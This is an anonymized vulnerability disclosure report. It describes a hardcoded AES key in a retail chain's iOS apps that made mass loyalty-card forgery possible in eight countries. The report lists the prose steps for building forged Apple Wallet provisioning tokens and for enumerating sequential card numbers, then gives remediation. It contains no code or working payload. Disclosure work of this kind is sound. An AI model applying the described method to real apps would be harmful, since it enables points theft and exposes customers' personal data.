← Back to all reports

Hardcoded AES Key in iOS App Enables Loyalty Card Forgery Across 8 Countries

Reported Mar 21, 2026
Severity Critical
Platform iOS
Vulnerability Class Hardcoded Cryptographic Key (CWE-321)
Target Type Retail / Beauty Chain
Impact Mass loyalty card forgery + points theft

The Risk

A retail chain's iPhone app contained a secret key that unlocked access to their entire loyalty card system. An attacker could create a fake digital loyalty card for any customer, complete with their name, points balance, and a working barcode that scans at the register. Customer card numbers were sequential and easy to guess. The same vulnerability affected all 8 of the chain's country-specific apps, putting customers across Europe at risk of having their loyalty points stolen and spent.

The Vulnerability

The iOS app bundled an encrypted configuration file containing API secrets. The decryption key was a UUID stored as a Swift lazy global variable, recoverable through runtime instrumentation. The first 16 bytes of the UUID served as the AES-128 key with a zero IV.

Decrypting the config file revealed 10 secrets including OAuth credentials, analytics API keys, and the digital wallet signing key.

The Attack

The digital wallet provider used a shared symmetric key to generate provisioning tokens. The flow:

  1. Take a customer's card number
  2. Encrypt it with AES-256-CBC using the extracted signing key (zero IV)
  3. Base64-encode the ciphertext
  4. Construct a provisioning URL with the token
  5. Open the URL on any iPhone

The victim's loyalty card is provisioned into the attacker's Apple Wallet, complete with full name, points balance, loyalty tier, and a scannable barcode. The barcode works at any store location.

Card Number Enumeration

The same decrypted config contained OAuth credentials that enabled guest token generation. An unauthenticated endpoint accepted card numbers and returned whether they were valid, along with the customer's VIP status flag. Card numbers were sequential, with 41 out of 41 tested numbers valid in the sampled range. No rate limiting was observed.

This turns a targeted attack into a mass exploitation scenario. An attacker could enumerate all valid card numbers, forge Apple Wallet passes for each, and extract or spend loyalty points at scale.

Cross-Country Scope

The encryption key and schema were identical across all 8 country variants of the app (Austria, Italy, France, Switzerland, Czech Republic, Romania, Hungary, Slovakia). The OAuth secret ciphertext was also identical between the iOS and Android builds, confirming the same key is used cross-platform.

The Impact

  • Forge Apple Wallet loyalty passes for any customer
  • Extract full name, loyalty tier, and points balance
  • Spend loyalty points at any physical store via the working barcode (150 points = 7.50 EUR voucher)
  • Enumerate all valid card numbers via unauthenticated endpoint
  • Affects 8 countries and both iOS and Android platforms
  • Zero authentication required, zero victim interaction

Remediation

  • Rotate the digital wallet signing keys for all 8 countries and both platforms
  • Remove the encryption key from the compiled binary. Fetch secrets at runtime from a hardened backend
  • Add server-side authentication to the digital wallet provisioning flow
  • Rate-limit and authenticate the card validation endpoint
  • Rotate OAuth credentials
  • Use per-user signed tokens instead of a shared symmetric key

All findings anonymized per responsible disclosure policies. No target names, endpoints, or identifiable details are included.